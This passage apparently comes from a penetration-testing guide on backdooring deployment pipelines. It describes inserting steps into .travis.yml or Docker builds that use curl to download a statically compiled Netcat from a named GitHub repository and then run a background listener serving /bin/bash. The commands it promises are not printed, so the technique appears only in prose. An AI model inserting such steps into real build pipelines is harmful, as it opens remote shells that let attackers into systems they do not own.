Deployment Pipeline
For either .travis.yml, a different build system, or Docker backdoor, there could be a simple insertion to perform the following tasks:
− Download a backdoor shell such as a Netcat (or Ncat) statically compiled binary
− Execute a backdoor listener in the background
If you have a payload on a system, you can always push data back
Since most systems include curl (or can be made to include curl), you have a few options to make these systems work together. You could bring down other binaries using curl, which is typically available in all distributions. You may want to bring down Netcat or Ncat or some other backdoor. These tools could be statically compiled ahead of time so that you have a stable and consistent set of tools without concerns for libraries or any number of deprecated features. Netcat on most Linux's, if it is even part of the standard build, will not be able to execute a shell, for example. Bringing your version of Netcat would restore that functionality. Typically, build and container systems allow for egress traffic without restrictions. While some of this is changing, there are plenty of unsecured workloads available today, and many are still being created with insufficient egress filtering.
Below, you will find an example that can be used for testing:
The curl line below will pull from "raw" GitHub from the mosesrenegade tools-repo. In this repo, you will find a raw copy of netcat 32-bit statically compiled and portable. The statically compiled binary is designed to work with the same OS kernel and version as the target. Keep this in mind.
Using our new binary, this will create a background process for /bin/bash in netcat. Just as an example of how to bring down tools, you can bring down many other tools; you can also create a multitude of netcat- like shells without necessarily downloading Netcat.
Last updated